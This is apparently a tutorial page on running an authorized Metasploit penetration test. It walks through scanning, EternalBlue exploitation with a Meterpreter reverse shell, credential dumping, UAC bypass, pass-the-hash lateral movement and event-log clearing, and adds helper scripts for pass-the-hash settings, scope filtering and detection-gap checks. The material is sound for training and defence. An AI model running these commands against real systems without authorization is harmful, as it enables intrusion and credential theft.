How to Use Metasploit for Authorized Pentesting
Metasploit Framework is the standard toolkit for offensive security professionals. This guide covers conducting a structured penetration test on systems you have explicit written authorization to test. Every command here should only be run against infrastructure you own or have a signed Rules of Engagement document for.
Legal and ethical boundary: Using Metasploit against systems you do not own or have written permission to test is a criminal offence: under the Computer Fraud and Abuse Act in the US, the Computer Misuse Act 1990 in the UK, the national laws implementing Directive 2013/40/EU across the EU, and equivalent statutes in nearly every other jurisdiction. Get written authorization before touching anything.
1. Install Metasploit Framework
# Kali Linux — pre-installed
msfconsole --version
# Ubuntu (official installer)
curl -s https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | sudo tee /usr/local/bin/msfinstall
sudo chmod 755 /usr/local/bin/msfinstall
sudo msfinstall
# Initialize the PostgreSQL database that backs workspaces, hosts, services and loot
# (without it db_nmap, hosts and services have nowhere to store results; on Kali run it with sudo,
# with the Ubuntu installer run msfdb init and msfconsole as the same user, since the connection
# settings land in that user's ~/.msf4). db_status inside the console should report "Connected".
sudo msfdb init
msfconsole
2. Engagement Workflow
A structured pentest follows these phases:
Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting
Log every command and its output with timestamps (msfconsole's spool command writes the whole console session to a file, and the TimestampOutput setting prefixes each output line with the time), and use a separate workspace per engagement so hosts, services and loot from different clients never mix.
3. Workspace Setup
msf6> workspace -a client_pentest_2026_03
msf6> workspace client_pentest_2026_03
msf6> workspace
* client_pentest_2026_03
default
Workspaces separate hosts, services, and loot by engagement.
4. Reconnaissance: Port Scanning
# Full TCP port sweep with version and default-script probes. -O (OS detection) needs root,
# and -sV over all 65535 ports of a /24 takes hours, so narrow the range or start with --top-ports
msf6> db_nmap -sV -sC -O -p 1-65535 192.168.100.0/24
# View discovered hosts
msf6> hosts
# View discovered services
msf6> services
# Filter by port
msf6> services -p 445
# Export for reporting
msf6> hosts -o /tmp/hosts.csv
msf6> services -o /tmp/services.csv
db_nmap runs nmap and automatically imports results into the database.
5. Search for Relevant Exploits
# Search by CVE
msf6> search cve:2021-34527 # PrintNightmare
msf6> search cve:2017-0144 # EternalBlue (MS17-010)
# Search by platform and type
msf6> search platform:windows type:exploit name:smb
# Search by service
msf6> search type:auxiliary name:ssh
# Check the module's rank, targets and side effects before choosing it
msf6> info exploit/windows/smb/ms17_010_eternalblue
Module rankings, best to worst: Excellent > Great > Good > Normal > Average > Low > Manual. Prefer Excellent or Great on production systems to limit the chance of crashing a target. Note that ms17_010_eternalblue is ranked Average precisely because a failed attempt can blue-screen the host; that is why the non-destructive check in the next section comes first, and why the client signs off before the exploit is run.
6. Example: SMB Vulnerability Check (No Exploitation)
Before exploiting, confirm the vulnerability is present with a scanner module that does not trigger the bug:
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6> set RHOSTS 192.168.100.0/24
msf6> set THREADS 10
msf6> run
# Output:
# [+] 192.168.100.15:445 - Host is likely VULNERABLE to MS17-010!
# [-] 192.168.100.16:445 - Host does NOT appear to be vulnerable.
7. Example: Exploitation with Meterpreter
After written confirmation to proceed beyond discovery (this module is ranked Average: a failed attempt can crash the target, so agree a maintenance window or a non-production host first):
msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6> set RHOSTS 192.168.100.15
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
# LHOST is the address the target must reach back to (your tester IP). Keep the value bare:
# set takes the rest of the line as the value, so a trailing comment breaks it
msf6> set LHOST 192.168.100.1
msf6> set LPORT 4444
msf6> set VERBOSE true
# Preview what will happen before running
msf6> info
# Execute
msf6> run
If successful:
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
8. Post-Exploitation: Evidence Gathering
Collect evidence for the report — screenshots, hash dumps, configuration files:
# Capture the screen
meterpreter > screenshot
# Running processes
meterpreter > ps
# Network connections
meterpreter > netstat
# Privilege escalation candidates (the same module is used again in section 9)
meterpreter > run post/multi/recon/local_exploit_suggester
# Gather credentials reachable from this session
meterpreter > run post/windows/gather/credentials/credential_collector
# Installed software (including AV/EDR products) and any configured AV exclusion paths
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_av_excluded
# File search (meterpreter needs backslashes doubled)
meterpreter > search -f *.config -d C:\\
meterpreter > search -f *password* -d C:\\Users\\
# Downloading the live hive C:\\Windows\\System32\\config\\SAM fails: Windows keeps it locked while running.
# Get the hashes through the registry instead (needs SYSTEM, see section 9), and only if the RoE allows credential extraction
meterpreter > hashdump
# Download an ordinary (unlocked) evidence file; the path is a placeholder
meterpreter > download C:\\Users\\Public\\evidence.config /tmp/evidence/
9. Privilege Escalation
# Automated local privilege escalation attempt (named-pipe impersonation and similar;
# it needs a session that already belongs to a local administrator)
meterpreter > getsystem
# If getsystem fails (typically a medium-integrity admin session, or an unprivileged user):
meterpreter > background
msf6> use post/multi/recon/local_exploit_suggester
msf6> set SESSION 1
msf6> run
# Try a suggested exploit. A UAC bypass only helps when the user is an admin; it opens a new
# high-integrity session, and getsystem is then run inside that new session
msf6> use exploit/windows/local/bypassuac_eventvwr
msf6> set SESSION 1
msf6> run
10. Lateral Movement (Authorized Scope Only)
Only attempt lateral movement to hosts explicitly included in the Rules of Engagement:
# Dump the local SAM hashes (needs SYSTEM; the module lives at post/windows/gather/hashdump,
# the meterpreter hashdump command does the same job)
meterpreter > run post/windows/gather/hashdump
# Pass the hash against other hosts in scope. SMBPass takes LM:NT. The value below is the well-known
# empty-password pair (aad3...ee means "no LM hash", 31d6...c0 is the NT hash of ""), shown only as a
# placeholder: substitute the hash you captured. psexec defaults SMBDomain to "." for local accounts;
# remote UAC filtering blocks pass-the-hash for local admins other than the RID 500 Administrator by default.
msf6> use exploit/windows/smb/psexec
msf6> set RHOSTS 192.168.100.20
msf6> set SMBUser Administrator
msf6> set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> run
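As an added example (my own, not code from the page or the Metasploit project), the snippet below turns one line of hashdump output into the psexec SMBUser/SMBPass settings and refuses the two cases that waste an attempt or hide a mistake: a malformed NT hash and the empty-password hash that the page's own placeholder value carries. The input layout it assumes is hashdump's user:RID:LMhash:NThash::: lines; the sample lines in demo() are constructed (8846...86c is the NT hash of "password"), and the RID-500 and LM-hash notes it prints are reminders, not anything the module checks for you.

```shell
#!/bin/sh
# Added example, not Metasploit project code: map a hashdump line to psexec settings,
# rejecting hashes that cannot be passed. Sample data in demo() is constructed.
set -u

EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # "no LM hash stored" placeholder

# pth_settings USER < hashdump.txt
# Prints `set` lines on success. Exit 1: user absent, 2: malformed NT hash,
# 3: empty-password hash (nothing to pass; usually a disabled account such as Guest).
pth_settings() {
  awk -F: -v want="$1" -v empty="$EMPTY_NT" -v noLM="$EMPTY_LM" '
    $1 == want {
      found = 1
      if (length($4) != 32 || $4 !~ /^[0-9a-f]+$/) {
        print want ": malformed NT hash " $4 > "/dev/stderr"; exit 2
      }
      if ($4 == empty) {
        print want ": empty-password hash, not a pass-the-hash target" > "/dev/stderr"; exit 3
      }
      if ($3 != noLM)
        print "# note: a real LM hash is stored (legacy host); still pass LM:NT as below"
      if ($2 != 500)
        print "# note: " want " is RID " $2 ", not the built-in Administrator; remote UAC filtering blocks PtH for other local admins by default"
      print "set SMBUser " want
      print "set SMBPass " $3 ":" $4
      exit 0
    }
    END { if (!found) { print want ": not present in hashdump output" > "/dev/stderr"; exit 1 } }'
}

# demo: constructed hashdump output with one usable account, one empty-password
# account and one non-RID-500 local admin
demo() {
  local f
  f=$(mktemp)
  printf '%s\n' \
    'Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::' \
    'Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::' \
    'svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::' > "$f"
  for u in Administrator Guest svc_backup; do
    echo "== $u"
    pth_settings "$u" < "$f" || echo "(skipped, exit $?)"
  done
  rm -f "$f"
}
demo
```

Paste the printed `set` lines into the psexec module (or a resource script) instead of copying a hash by hand; the exit codes let a wrapper script stop before it fires a doomed psexec attempt that will still land in the client's 4625 logs.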
11. Cleanup (Critical)
Leave systems as you found them, minus the artifacts you introduced. Do not erase the client's own records:
# clearev wipes the Application, System and Security logs. That destroys the client's evidence of the test
# and is itself a high-impact, detectable action (event 1102). Run it only if the Rules of Engagement explicitly require it.
meterpreter > clearev
# Remove any files you uploaded yourself
meterpreter > rm C:\\Windows\\Temp\\payload.exe
# Terminate sessions cleanly
meterpreter > exit
# Kill all remaining sessions (the listeners they came from are jobs; jobs -K stops those)
msf6> sessions -K
# Export the workspace for your records; delete it (workspace -d) only after the report is delivered
# and the agreed data retention period has ended
msf6> db_export -f xml /tmp/client_pentest_2026.xml
12. Generate a Report
# Export all findings to XML
msfconsole -q -x "workspace client_pentest_2026_03; \
db_export -f xml /tmp/pentest_data.xml; exit"
# Use Dradis (open-source pentest reporting tool) to build the report
# Dradis CE is a Rails web application, not a single gem; on Kali it is packaged
sudo apt install dradis
# Recommended report structure:
# 1. Executive Summary
# 2. Scope and Methodology
# 3. Critical Findings (with CVSS scores, evidence screenshots)
# 4. High / Medium / Low Findings
# 5. Remediation Roadmap
# 6. Testing Timeline (every command, every timestamp)
Automation: Resource Scripts
Metasploit resource scripts automate repeated tasks:
# /tmp/smb_scan.rc
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS file:/tmp/targets.txt
set THREADS 20
run
exit
msfconsole -r /tmp/smb_scan.rc
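An added example, written for this page rather than taken from it or from the Metasploit project, that ties the workspace, scanning and resource-script sections together: it reads the CSV written by `hosts -o`, keeps only addresses inside the Rules-of-Engagement CIDRs, writes the survivors to a file for `set RHOSTS file:`, and generates a resource script that selects the workspace, logs the whole console session with timestamps (msfconsole's spool command plus the TimestampOutput setting) and runs the MS17-010 check. It assumes the first CSV column is the address, as in the hosts export; the CIDR arguments stand in for the signed scope, and the hosts in demo() are constructed.

```shell
#!/bin/sh
# Added example, not Metasploit project code. Builds an in-scope target list from a
# `hosts -o` CSV export and writes a resource script that logs the run.
# Assumptions: CSV column 1 is the address; the CIDR arguments are the signed scope;
# the sample hosts in demo() are constructed.
set -u

# ip_to_int 192.168.100.15 -> 3232261135 (dotted quad to 32-bit integer)
ip_to_int() {
  local IFS=.
  set -- $1
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# in_scope IP CIDR... : exit 0 if IP lies inside any of the CIDRs
in_scope() {
  local ip ipn cidr net bits netn mask
  ip=$1; shift
  ipn=$(ip_to_int "$ip")
  for cidr in "$@"; do
    net=${cidr%/*}; bits=${cidr#*/}
    netn=$(ip_to_int "$net")
    if [ "$bits" -eq 0 ]; then mask=0
    else mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF )); fi
    [ $(( ipn & mask )) -eq $(( netn & mask )) ] && return 0
  done
  return 1
}

# filter_targets HOSTS_CSV OUT_FILE CIDR... : in-scope addresses go to OUT_FILE,
# dropped ones are reported on stderr, the in-scope count is printed on stdout
filter_targets() {
  local csv=$1 out=$2 ip rest n=0
  shift 2
  : > "$out"
  while IFS=, read -r ip rest; do
    ip=$(printf '%s' "$ip" | tr -d '"')          # hosts -o quotes its fields
    case "$ip" in ''|address) continue ;; esac    # blank line or header row
    if in_scope "$ip" "$@"; then
      echo "$ip" >> "$out"; n=$((n + 1))
    else
      echo "OUT OF SCOPE, dropped: $ip" >&2
    fi
  done < "$csv"
  echo "$n"
}

# write_rc WORKSPACE TARGETS_FILE SPOOL_LOG OUT_RC : resource script for the MS17-010 check,
# with the whole session spooled to a timestamped log for the report's testing timeline
write_rc() {
  local ws=$1 targets=$2 spool=$3 rc=$4
  cat > "$rc" <<EOF
# generated $(date -u +%Y-%m-%dT%H:%M:%SZ) for workspace $ws
workspace -a $ws
workspace $ws
spool $spool
set TimestampOutput true
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS file:$targets
set THREADS 10
run
spool off
exit
EOF
}

# demo: constructed hosts export with one host outside the 192.168.100.0/24 scope
demo() {
  local dir
  dir=$(mktemp -d)
  printf 'address,mac,name,os_name\n"192.168.100.15","","",""\n"192.168.100.16","","",""\n"10.0.0.5","","",""\n' > "$dir/hosts.csv"
  filter_targets "$dir/hosts.csv" "$dir/targets.txt" 192.168.100.0/24
  write_rc client_pentest_2026_03 "$dir/targets.txt" "$dir/console.log" "$dir/smb_scan.rc"
  cat "$dir/smb_scan.rc"
  echo "run with: msfconsole -q -r $dir/smb_scan.rc"
}
demo
```

The scope check runs before anything touches the network, so a host that nmap found through a mis-typed range never reaches RHOSTS; the dropped addresses on stderr belong in the engagement log as well, since they are exactly the ones a client will ask about.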
Defense Correlation
Every action in this guide should be detectable. Use this to validate your defenses:
| Offensive Action | Expected Detection |
|---|---|
| db_nmap port scan | IDS scan signature (Snort/Suricata), firewall connection logs |
| smb_ms17_010 check / EternalBlue exploit | Snort/Suricata MS17-010 SMB rules; a failed exploit attempt can also surface as an unexplained reboot of the target |
| Meterpreter reverse shell | EDR alert on reflective DLL loading / process injection; egress from the target to an unknown host on the handler port |
| getsystem / bypassuac_eventvwr | Process-creation events (4688, Sysmon 1) showing the elevated child; the eventvwr bypass writes under HKCU\Software\Classes\mscfile (Sysmon 13) |
| hashdump | Registry/SAM hive access (4656/4663 with object auditing) for the post module; Sysmon event 10 (ProcessAccess on lsass.exe) for in-memory paths such as kiwi |
| clearev | Windows event 1102 (audit log cleared), forwarded by the Wazuh agent |
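The table is only useful if someone checks it against what the SIEM actually recorded. The added example below (mine, not code from this page, Wazuh or Suricata) runs that check over a log extract: it counts the alerts matching each row and lists the rows with none, which is the detection-gap finding that goes in the report. The sample lines it uses are constructed in the shape a tester typically receives from the client: Suricata fast.log-style alerts with local-range signature IDs, and Windows Security events flattened to EventID=NNNN key-value text.

```shell
#!/bin/sh
# Added example, not Metasploit/Wazuh/Suricata code: correlate a log extract with the
# detections the table expects and report the gaps. Sample log lines are constructed.
set -u

# correlate LOGFILE : prints "action<TAB>count" for each row of the table
correlate() {
  awk '
    /ET SCAN/                        { n["db_nmap_scan"]++ }
    /ETERNALBLUE/ || /MS17-010/      { n["eternalblue"]++ }
    /Meterpreter/ || /reflective/    { n["meterpreter_shell"]++ }
    /EventID=4656/ && /\\SAM/        { n["hashdump"]++ }
    /EventID=1102/                   { n["clearev"]++ }
    END {
      split("db_nmap_scan eternalblue meterpreter_shell hashdump clearev", order, " ")
      for (i = 1; i <= 5; i++) printf "%s\t%d\n", order[i], n[order[i]] + 0
    }' "$1"
}

# detection_gaps LOGFILE : actions that produced no alert at all (a blind spot to report)
detection_gaps() {
  correlate "$1" | awk -F'\t' '$2 == 0 { print $1 }'
}

# write_sample_log FILE : constructed extract. The Meterpreter session is deliberately
# absent, the way an EDR gap looks from the tester's side.
write_sample_log() {
  printf '%s\n' \
    '10/14/2026-09:01:12.000000  [**] [1:1000001:1] ET SCAN Nmap SYN scan (constructed) [**] [Priority: 2] {TCP} 192.168.100.1:51234 -> 192.168.100.15:445' \
    '10/14/2026-09:20:41.000000  [**] [1:1000002:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response (constructed) [**] [Priority: 1] {TCP} 192.168.100.15:445 -> 192.168.100.1:51400' \
    '2026-10-14T09:31:05Z host=WS15 EventID=4656 ObjectName=\REGISTRY\MACHINE\SAM\SAM\Domains\Account SubjectUserName=SYSTEM' \
    '2026-10-14T09:40:00Z host=WS15 EventID=1102 SubjectUserName=SYSTEM Message="The audit log was cleared"' > "$1"
}

demo() {
  local f
  f=$(mktemp)
  write_sample_log "$f"
  echo "detections:"; correlate "$f"
  echo "gaps (no alert recorded):"; detection_gaps "$f"
  rm -f "$f"
}
demo
```

Each pattern is a loose keyword match on purpose: the point is to reconcile the timeline you kept (section 2) with the client's alerts action by action, and every row left in the gaps list becomes a finding about their monitoring rather than about the host.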
Related Reading
- How to Use Nessus for Vulnerability Scanning
- How to Set Up Snort IDS on Linux
- How to Set Up Wazuh SIEM for Small Teams
Built by theluckystrike — More at zovo.one